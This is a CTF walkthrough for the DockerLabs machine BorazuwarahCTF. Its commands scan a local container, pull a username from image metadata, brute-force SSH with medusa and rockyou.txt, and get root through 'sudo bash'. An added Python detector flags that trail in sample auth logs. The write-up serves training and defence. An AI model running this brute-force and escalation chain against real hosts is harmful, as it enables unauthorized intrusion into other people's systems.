BorazuwarahCTF

machine downloaded from: https://dockerlabs.es/

difficulty: Very Easy

OS: Linux

14 September 2025


  1. Start the container.
     bash auto_deploy.sh borazuwarahctf.tar
  2. Quick host scan.
     nmap -A -T5 172.17.0.2

Nmap detected two services:

  • Port 22 ssh
  • Port 80 http

  3. Web discovery.
     dirb http://172.17.0.2
  4. Download the image and inspect its metadata and strings.
     wget http://172.17.0.2/imagen.jpg -O imagen.jpg
     exiftool imagen.jpg
     strings imagen.jpg | less

Username borazuwarah found.

  5. SSH brute force using medusa.
     medusa -h 172.17.0.2 -F -u borazuwarah -P /usr/share/wordlists/rockyou.txt -M ssh
  6. Privilege escalation after successful login.
     ssh borazuwarah@172.17.0.2
     # once in:
     sudo -l          # show sudo rights
     sudo bash        # root shell through sudo
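
Seen from the defender's side, steps 5 and 6 leave a recognisable trail in the SSH and sudo logs: a run of failed passwords for one account from one source, then a success, then a root shell through sudo. The Python below is an added example, not part of the original write-up; the log lines are constructed samples in the usual sshd/sudo syslog format, and the function name `detect` and its threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample auth.log lines (not captured from the lab machine).
SAMPLE_LOG = "\n".join(
    [f"Sep 14 10:00:{i:02d} lab sshd[{100 + i}]: Failed password for borazuwarah "
     f"from 172.17.0.1 port {40000 + i} ssh2" for i in range(1, 7)]
    + [
        "Sep 14 10:00:07 lab sshd[107]: Accepted password for borazuwarah from 172.17.0.1 port 40007 ssh2",
        "Sep 14 10:00:30 lab sudo: borazuwarah : TTY=pts/0 ; PWD=/home/borazuwarah ; USER=root ; COMMAND=/usr/bin/bash",
        # Benign noise: one mistyped password, then a package update via sudo.
        "Sep 14 10:05:00 lab sshd[120]: Failed password for alice from 10.0.0.5 port 51000 ssh2",
        "Sep 14 10:05:09 lab sshd[121]: Accepted password for alice from 10.0.0.5 port 51002 ssh2",
        "Sep 14 10:06:00 lab sudo: alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update",
    ]
)

SSH_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port")
# sudo entries where the command run as root is an interactive shell binary.
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?: +(\S+) : .*USER=root ; COMMAND=(\S*/(?:ba|da|z)?sh)\b")

def detect(log_text, threshold=5):
    """Flag logins that follow >= threshold failures, and later root shells by that user."""
    failures = defaultdict(int)   # (user, source) -> failures since last success
    guessed = set()               # users whose password was apparently guessed
    alerts = []
    for line in log_text.splitlines():
        m = SSH_RE.search(line)
        if m:
            outcome, user, src = m.groups()
            if outcome == "Failed":
                failures[(user, src)] += 1
            else:
                if failures[(user, src)] >= threshold:
                    guessed.add(user)
                    alerts.append(("bruteforce_success", user, src, failures[(user, src)]))
                failures[(user, src)] = 0
            continue
        m = SUDO_RE.search(line)
        if m and m.group(1) in guessed:
            alerts.append(("root_shell_after_bruteforce", m.group(1), m.group(2)))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Both alerts trace back to weaknesses the walkthrough relies on: a password that appears in a common wordlist and a sudo rule broad enough to allow a root shell.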